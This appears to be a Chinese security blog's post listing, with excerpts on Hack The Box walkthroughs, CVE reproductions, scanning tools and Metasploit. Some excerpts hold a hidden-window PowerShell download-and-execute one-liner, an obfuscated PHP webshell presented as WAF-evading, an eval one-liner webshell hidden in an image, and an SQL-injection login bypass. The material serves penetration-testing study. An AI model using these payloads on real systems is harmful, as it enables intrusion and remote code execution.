- 博客(52)
- 收藏
- 关注
RSS订阅
原创 apache RocketMQ远程代码执行(CVE-2023-33246)
RocketMQ是阿里巴巴在2012年开发的分布式消息中间件,专为万亿级超大规模的消息处理而设计,具有高吞吐量、低延迟、海量堆积、顺序收发等特点。它是阿里巴巴双十一购物狂欢节和众多大规模互联网业务场景的必备基础设施。RocketMQ的NameServer、Broker、Controller等多个组件暴露在外网且缺乏权限验证,攻击者可以利用该漏洞利用更新配置功能以RocketMQ运行的系统用户身份执行命令。
2023-06-05 20:23:39
994
原创 Hack The Box - Crocodile关卡
我们可以使用目录暴力破解来识别哪个 PHP 文件,该文件将提供向 Web 服务进行身份验证的机会?我们从FTP服务器下载的“allow.userlist”中听起来更高的特权用户名之一是什么?匿名连接到FTP服务器后,我们可以使用什么命令来下载我们在FTP服务器上找到的文件?我们可以与 Gobuster 一起使用什么开关来指定我们正在寻找特定的文件类型?使用ftp客户端连接到FTP服务器后,当提示匿名登录时,我们会提供什么用户名?对于“允许匿名FTP登录”消息,将返回给我们什么FTP代码?
2023-05-31 11:21:37
811
原创 Hack The Box - sequel关卡
此 MySQL 实例中有三个数据库,它们在所有 MySQL 实例中都是通用的。使用 MySQL 命令行客户端时,我们需要使用什么开关来指定登录用户名?在 SQL 中,我们可以使用什么符号在查询中指定要显示表内的所有内容?扫描时,发现主机down了但是根据题目可知是开启3306MySQL服务。哪个用户名允许我们在不提供密码的情况下登录此MariaDB实例?在扫描过程中,我们发现哪个端口为 MySQL 提供服务?在 SQL 中,我们需要用什么符号来结束每个查询?目标运行的是哪个社区开发的MySQL版本?
2023-05-31 10:15:19
841
原创 Hack The Box - appointment关卡
我们与 Gobuster 一起使用什么开关来指定我们要发现目录,而不是子域?访问目标地址,发现是个登陆页面,username:admin '#,password随意,尝试登陆,成功登陆并获取flag。网页上返回的第一个单词是什么?此漏洞的 2021 年 OWASP 前 10 名分类是什么?在 MySQL 中,可以使用哪个字符来注释掉一行的其余部分?对于“未找到”错误,给出的 HTTP 响应代码是什么?最常见的 SQL 漏洞类型之一是什么?HTTPS 协议使用的标准端口是什么?首字母缩略词SQL代表什么?
2023-05-29 17:35:03
919
原创 Hack The Box-Redeemer关卡
在与Redis服务器成功连接后,我们应该能够在终端中看到如图所示的提示。一个基本的Redis枚举命令是info,它返回关于服务器的信息。由于这个命令的输出很长,我只截图出有用的信息。统计数据包括密钥的数量,以及过期的密钥的数量。Redis是什么类型的数据库?连接到 Redis 服务器后,使用哪个命令获取有关 Redis 服务器的信息和统计信息?在本关中,在Keyspace部分下,我们可以看到只有一个索引为0的数据库存在。哪个命令用于在 Redis 中选择所需的数据库?哪个命令用于获取数据库中的所有密钥?
2023-05-29 17:06:37
907
原创 Hack The Box - 关卡Dancing
SMB(全称是Server Message Block)是一个协议名,可用于在计算机间共享文件、打印机、串口等,电脑上的网上邻居就是靠它实现的。SMB 是一种客户机/服务器、请求/响应协议。通过 SMB 协议,客户端应用程序可以在各种网络环境下读、写服务器上的文件,以及对服务器程序提出服务请求。此外通过 SMB 协议,应用程序可以访问远程服务器端的文件、以及打印机等资源。
2023-05-29 09:42:03
1214
原创 HackTheBox-关卡Fawn
FTP的安全版本是 安全文件传输协议,即Secure File Transfer Protocol,缩写为SFTP。问题是:当您想在没有帐户的情况下登录时,通过 FTP 使用的用户名是什么?问题是:我们使用什么工具通过 ICMP 回显请求测试与目标的连接?问题是:根据您的扫描,目标上运行的 FTP 版本是什么?FTP监听的TCP端口号为21,监听的数据端口为20。问题是:根据您的扫描,目标上正在运行什么操作系统类型?问题是:FTP 的安全版本使用什么首字母缩写词?此处的答案为:ftp -h。
2023-05-24 18:27:27
933
原创 仿射密码理论及代码实现
在这个示例代码中,定义了mod_inverse函数来计算逆元,affine_encrypt函数来加密明文,affine_decrypt函数来解密密文。其中,a^-1是a的逆元,x是加密后的字母。逆元是指一个数在模意义下的乘法逆元,即满足a * a^-1 = 1 (mod 26)的数a^-1。在仿射密码中,每个字母都被映射到一个新的字母,这个映射是通过一个线性函数来实现的。其中,x是明文中的字母,a和b是密钥中的参数,mod 26表示结果对26取模,以确保加密后的字母仍然是一个字母。
2023-04-22 17:05:12
1037
原创 phpmyadmin 4.8.1远程文件包含漏洞(CVE-2018-12613)
phpmyadmin 4.8.1远程文件包含漏洞(CVE-2018-12613)复现
2022-12-06 19:10:00
595
原创 cs在内网横向的使用(靶机)
1.cs上线目标(1)设置监听器添加监听(2) 上线目标如果目标可以出外网,我们可以使用让目标访问我们的cs服务器上的恶意代码,并下载执行,比较常见的就是使用如下图所使用的模块根据目标的版本位数,选择是否要用 x64,点击执行后会出现如图所示窗口复制代码(这里要选择x64的payload) powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http:///b'))"
2021-11-02 23:54:01
1677
1
原创 JAVA与C学习笔记
1.1软件开发介绍软件开发软件即一系列按照特定顺序组织的计算机数据和指令的集合。有系统软件和应用软件之分。人机交互方式图形化界面(Graphical User Interface GUI):这种方式简单直观使用者易于接受,容易上手操作。命令行方式(Command Line Interface CLI):需要有一个控制台,输入特定的指令,让计算机完成一些操作。较为麻烦,需要记录住一些命令。...
2021-09-02 10:26:58
278
1
原创 meterpreter命令总结
前言Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。Meterpreter功能强大,支持信息收集、提权、注册表操作、哈希利用、截屏录屏等操作,也支持对摄像头、录音设备、键盘鼠标的控制。常用命令sessions -i 进入会话sessions -k 杀死会话pwd 查看当前目录getuid 查看当前用户信息sysinfo 查看远程主机系统信息execute
2021-06-03 11:22:14
3063
原创 linux可爱的小命令
没用的知识增加了1.蒸汽小火车sudo apt-get install slsl2.今天你哞了吗谁能拒绝一只会moo的小牛apt-get moo3.会说话的小牛谁能拒绝一只会说话的小牛sudo apt-get install cowsaycowsay -l 查看其它动物的名字,然后 -f 跟上动物名cowsay -f kitty "sweetie yyds"kitty的画居然是这样的 破防了 家人们...
2021-06-03 11:11:47
3955
24
原创 nc的基本操作和反弹shell
一、nc简介nc 在网络工具中有“瑞士军刀”美誉 ,所做的就是在两台电脑之间建立链接,并返回两个数据流。可运行在TCP或者UDP模式,添加参数 ----u 则调整为UDP,默认为TCP即可用在windows系统也可在linux系统,也可作用于二者之间,只是对应的命令有些差异。二、nc常用参数-l 开启监听-p 指定一个端口-v 显示详细输出-e 指定对应的应用程序-n nc不要DNS反向查询IP的域名-z 连接成功后立即关闭连接三、建立C-S连接1 环境
2021-05-09 12:36:37
10904
原创 漏洞复现-vulhub复现Weblogic的SSRF漏洞
模拟Weblogic的SSRF漏洞实验:1.打开搭建好vulhub的虚拟机,输入su切换到root用户如果不切换,则会报下面的错2、进入到vulhub下weblogic/ssrf/中用gedit打开靶场说明书README.mdlsgedit README.md 3、使用docker-compose up -d命令打开靶场,复制网址http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp4、用ifconfig或ip addr
2021-05-08 19:12:57
1522
原创 网络安全实验室|网络信息安全攻防学习平台(基础关1-12)
1.key在哪里地址:http://lab1.xseclab.com/base1_4a4d993ed7bd7d467b27af52d2aaa800/index.php解题思路:按f12查看源码2.再加密一次你就得到key啦~加密之后的数据为xrlvf23xfqwsxsqf地址:http://hackinglab.cn/ShowQues.php?type=bases解题思路:根据提示再加密一次得到key,这是rot13加密的特点,再用rot13加密一次,得到key3.猜猜这是经过了多少次加密
2021-05-07 20:15:21
1130
4
原创 小马的免杀
一般的php一句话后门很容易被网站防火墙waf拦截,而waf通常通过判断关键字来辨别一句话木马,要想绕过waf就需要对木马进行一些变形。(仅供分享经验,不可用作非法用途)图片来源一.先看一只有趣的小马<?php ($b4dboy = $_POST['b4dboy']) &&@preg_replace('/ad/e','@'.str_rot13('riny')."($b4dboy)", 'add'); ?>沙箱检测它是安全文件用D盾查杀只是发现可以的str_rot1
2021-04-12 12:29:47
920
原创 vulhub安装教程(centos7)
Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。一.安装dockercurl -sSL https://get.daocloud.io/docker | sh使用docker命令检测是否安装成功二.安装git(有则跳过) yum -y install gitgit clone https://github.com/vulhub/vulhub.g
2021-04-11 13:26:25
2233
2
原创 hfish蜜罐搭建及简单使用
蜜罐搭建为了方便搭建,此处使用Docker搭建Hfish蜜罐,项目官方地址:https://hub.docker.com/r/imdevops/hfish,镜像拉取如下:docker imagesdocker search hfishdocker pull imdevops/hfish容器启动成功后可先访问下 centos8虚拟机 9000 端口看看 Web服务,发现是一个 WordPress 站点登录页面:此时继续访问 9001 端口可访问查看 Hfish 蜜罐后台管理系统:账
2021-03-16 17:00:08
13902
8
原创 Centos8安装php,apache,mysql
安装apache:yum install httpd//配置ServerName//将#ServerName www.example.com:80修改为ServerName localhost:80vi /etc/httpd/conf/httpd.conf//启动apache:systemctl start httpd///查看安装版本: (我的是apache/2.4.37)httpd -v//设置开机启动:systemctl enable httpd安装mysql:yum
2021-03-08 11:55:24
1555
原创 常见端口漏洞利用
常见端口漏洞利用快速扫描:Masscan -p80,800 ip --rate=10000 21/ FTP匿名/暴力破解 拒绝服务22/ SSH暴力破解23/ telnetWinbox(cve-2018-14847)161/ snmp弱口令 https://blog.csdn.net/archersaber39/article/details/78932252389/ ladp匿名访问 https://www.cnblogs.com/persuit/p/5706432.
2021-03-05 08:40:23
3397
2
原创 metasploit小白教程总结
msf小白学习教程一1.msf是什么?msf全称:metasplpit作用:Metasploit是一个渗透测试平台环境:kali-linux 自动搭建了msf环境2.msf的详细分解在这边我就化繁为简,把一些我感觉重要常用的功能详细的讲解一番。2.1搜索模块首先肯定是启动msf,启动就很简单了,在kali命令行输入:msfconsole 如果记不住,可以直接:msfc然后加一个tab,然后就会自动补全,回车就好了。2.1.1 搜索模块命令:search命令介绍:msfconsole
2021-01-03 16:00:23
2465
1
原创 mac博客搭建
mac博客搭建前言:之前用windows搭建过博客,因为图片原因,导致荒废不用,近期突然又想用mac重新搭建一个博客,本以为可以很轻松的解决,但没想到碰到了一个又一个的坑,直到最后我都想放弃,使用虚拟机搭建,功夫不负有心人,最后一天晚上完成了基础的博客搭建。*______________________________________________________________####*需提示:搭建博客时大部分命令都需要使用sudo才可以成功执行,因为我已经搭建好了才写的博客,我也忘了哪里需要
2020-12-24 08:40:40
619
2
原创 sqli-labs闯关笔记
文章目录第一关第一关1.经过语句and 1=2测试 ,页面回显正常,所以该地方不是数值查询http://sqli-labs:84/Less-1/?id=1 and 1=2--+%20是空格2.在id后面加上’,发现页面回显不正常,表示可能存在SQL字符注入http://sqli-labs:84/Less-1/?id=1'%27是单引号3.输入--+将sql后面的语句注视掉后,发现页面回显正常,则证明这个地方是单引号字符型注入...
2020-12-03 10:44:01
170
原创 masscan常用命令
基础扫描扫描某一个端口masscan 222.182.111.1/24 -p80扫描多个端口masscan 222.182.111.1/24 -p80,81,8080或者masscan 222.182.111.1/24 -p22-25快速扫描指定扫描速度masscan 222.182.111.1/24 -p80 --rate 100000-rate 100000指定每秒扫描100000个数据包指定不扫描某文件内的ipmasscan 222.182.111.1/24 -p80
2020-11-30 11:59:01
2536
转载 IP地址分类和分段
IP地址是由32位二进制数字构成,采用“点分十进制”方法表示的唯一地址。通常区分如下:1.五类IP 2.特殊用途的IP 3.私有IP五类IPA类地址定义:第1字节为网络地址,其它3个字节为主机地址范围:1.0.0.1 - 126.255.255.254子网掩码:255.0.0.0私有地址:10.X.X.X是私有地址(所谓的私有地址就是在互联网上不使用,而被用在局域网络中的地址),范围10.0.0.0-10.255.255.255保留地址127.X.X.X是保留地址,用做循环测试用的B
2020-11-30 11:43:27
1049
原创 nmap基本使用方法
1. nmap简单扫描nmap默认发送一个ARP的PING数据包,来探测目标主机1-10000范围内所开放的所有端口命令语法:nmap <target ip address>其中:target ip address是扫描的目标主机的ip地址扫描出开放的端口扫描所有主机nmap 192.166.5.10.* //可以用*通配符代表范围内的所有主机扫描多个目标nmap 192.168.1.1 192.168.2.2 //加空格分隔,写第二个ipAddress
2020-11-20 10:18:07
1304
1
原创 nmap常用命令
kali有自带nmapnmap语法及其常用命令-A :全面扫描. 综合扫描. 是一种完整扫描目标信息的扫描方式.–exclude : 排除指定的地址 例: nmap 192.168.1.0/24 --exclude 192.168.1.1 那么就不会对192.168.1.1进行扫描,–excludefile : 排除指定的地址列表 例: nmap 192.168.1.0/24 --excludefile list.txt 那么就不会对list.
2020-11-18 21:27:36
361
原创 虚拟机提示“虚拟设备在启动时将处于断开连接状态”
出现上述的原因是将虚拟机设置中硬件的CD/DVD设置为使用物理驱动器-自动检测,修改为使用ISO映像文件即可
2020-11-11 18:00:57
5138
3
原创 图片一句话木马的简单制作
新建一个文件夹其中放入一张图片,shell.php一句话木马,写入cmd的bat文件shell.php中的一句话木马内容为<?php @eval($_POST[sweetie]);?>点击bat文件进入DOS命令,写入"copy 1.jpg/b+shell.php shell.jpg" 回车...
2020-11-11 14:22:15
1281
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人